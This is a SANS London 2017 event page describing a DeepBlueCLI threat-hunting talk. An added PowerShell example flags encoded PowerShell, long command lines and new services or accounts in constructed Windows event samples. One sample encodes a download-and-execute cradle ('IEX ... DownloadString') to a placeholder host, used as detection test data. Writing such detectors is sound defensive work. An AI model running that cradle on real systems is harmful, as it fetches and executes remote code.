
London March 2017

London, United Kingdom | Mon, Mar 13 - Sat, Mar 18, 2017

Introducing DeepBlueCLI, a PowerShell module for hunt teaming via Windows event logs

  • Eric Conrad
  • Tuesday, March 14th, 7:00pm - 8:00pm

A number of events are triggered in Windows environments during virtually every successful breach. These include service creation events and errors, user creation events, extremely long command lines, compressed and base64-encoded PowerShell functions, and more. Microsoft has added a wealth of blue team tools to its operating systems, including native logging of the full command line used to launch every process, without requiring third-party tools (or Sysmon); KB3004375 backports this feature to Windows 7 and Server 2008 R2. Note that the feature must be enabled by policy before Event ID 4688 carries the command line. DeepBlueCLI automatically identifies the events that are typically triggered during the majority of successful breaches, including malicious command lines and PowerShell invocations.
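The following is an added example in the spirit of the talk, not DeepBlueCLI's own code: a small PowerShell hunt that applies the checks the abstract lists (long command lines, base64-encoded PowerShell, service creation, user creation) to a handful of constructed event objects shaped like `Get-WinEvent` output. The event messages, the account and service names, the `example.invalid` URL and the 1000-character threshold are all assumptions made for the example.

```powershell
# Added example (not DeepBlueCLI). Hunts a list of event objects with the fields
# Get-WinEvent returns (Id, TimeCreated, Message). On a live host you would feed it
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688,4720}
#   Get-WinEvent -FilterHashtable @{LogName='System';   Id=7045}
# 4688 only carries "Process Command Line" once process creation auditing and the
# "Include command line in process creation events" policy are enabled
# (KB3004375 on Windows 7 / Server 2008 R2).

function Get-MessageField {
    param([string]$Message, [string]$Field)
    # Event message bodies list fields as "Name: value", one per line.
    # Caveat: a real 4720 message has two "Account Name" lines (Subject and New Account);
    # for production use, read the typed Properties collection instead of the text.
    if ($Message -match "(?m)^\s*$([regex]::Escape($Field)):\s*(.+?)\s*$") { return $Matches[1] }
    return $null
}

function Get-EncodedCommand {
    param([string]$CommandLine)
    # powershell.exe accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...), case-insensitively.
    if ($CommandLine -match '(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # not valid base64: leave it to the long-command-line check
    }
    return $null
}

function Invoke-EventHunt {
    param([object[]]$Events, [int]$LongCommandLine = 1000)   # threshold is an assumption
    foreach ($e in $Events) {
        $finding = $null; $detail = $null
        if ($e.Id -eq 4688) {
            $cmd = Get-MessageField -Message $e.Message -Field 'Process Command Line'
            if ($cmd) {
                $decoded = Get-EncodedCommand -CommandLine $cmd
                if ($decoded) {
                    $finding = 'Base64-encoded PowerShell command'; $detail = $decoded
                } elseif ($cmd.Length -gt $LongCommandLine) {
                    $finding = "Long command line ($($cmd.Length) chars)"; $detail = $cmd.Substring(0, 60) + '...'
                }
            }
        } elseif ($e.Id -eq 7045) {
            $finding = 'New service installed'
            $detail  = (Get-MessageField $e.Message 'Service Name') + ' -> ' + (Get-MessageField $e.Message 'Service File Name')
        } elseif ($e.Id -eq 4720) {
            $finding = 'User account created'
            $detail  = Get-MessageField $e.Message 'Account Name'
        }
        if ($finding) {
            [pscustomobject]@{ Time = $e.TimeCreated; Id = $e.Id; Finding = $finding; Detail = $detail }
        }
    }
}

# Constructed sample events (not real log data). The repeated 'A's stand in for an
# "extremely long" command line; the base64 blob is a UTF-16LE PowerShell one-liner.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'))
$events = @(
    [pscustomobject]@{ Id = 4688; TimeCreated = Get-Date '2017-03-14 19:00:01'
        Message = "A new process has been created.`r`nNew Process Name: C:\Windows\System32\notepad.exe`r`nProcess Command Line: notepad.exe C:\Users\alice\notes.txt" }
    [pscustomobject]@{ Id = 4688; TimeCreated = Get-Date '2017-03-14 19:00:02'
        Message = "A new process has been created.`r`nNew Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`r`nProcess Command Line: powershell.exe -NoP -W Hidden -Enc $encoded" }
    [pscustomobject]@{ Id = 4688; TimeCreated = Get-Date '2017-03-14 19:00:03'
        Message = "A new process has been created.`r`nNew Process Name: C:\Windows\System32\cmd.exe`r`nProcess Command Line: cmd.exe /c $('A' * 1500)" }
    [pscustomobject]@{ Id = 7045; TimeCreated = Get-Date '2017-03-14 19:00:04'
        Message = "A service was installed in the system.`r`nService Name: PSEXESVC`r`nService File Name: %SystemRoot%\PSEXESVC.exe" }
    [pscustomobject]@{ Id = 4720; TimeCreated = Get-Date '2017-03-14 19:00:05'
        Message = "A user account was created.`r`nNew Account:`r`n`tAccount Name: backdoor" }
)

Invoke-EventHunt -Events $events | Format-Table -AutoSize -Wrap
```

Run against the constructed input, the benign notepad launch produces nothing, while the encoded PowerShell line is decoded and reported, the 1511-character `cmd.exe` line is flagged as long, and the service and account creations are listed. The encoded-command check runs before the length check because a long base64 argument is more useful reported as its decoded contents than as a character count.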


Bonus Sessions

The following bonus sessions are open to all paid attendees at no additional cost. There are many different types of events that fall into these categories:

  • SANS@Night: Evening presentations given after day courses have ended. This category includes Keynotes.
Monday, March 13
Session | Speaker | Time | Type
Keynote: Let's reverse exploits - IoT, RansomWare & More | James Lyne | Monday, March 13th, 7:00pm - 9:00pm | Keynote

Tuesday, March 14
Session | Speaker | Time | Type
Introducing DeepBlueCLI, a PowerShell module for hunt teaming via Windows event logs | Eric Conrad | Tuesday, March 14th, 7:00pm - 8:00pm | SANS@Night

Wednesday, March 15
Session | Speaker | Time | Type
Bypassing iOS application anti-debugging technique and jailbreak detection | Alexandre Becholey | Wednesday, March 15th, 6:00pm - 7:00pm | SANS@Night
The 14 Absolute Truths of Security | Keith Palmgren | Wednesday, March 15th, 7:00pm - 8:00pm | SANS@Night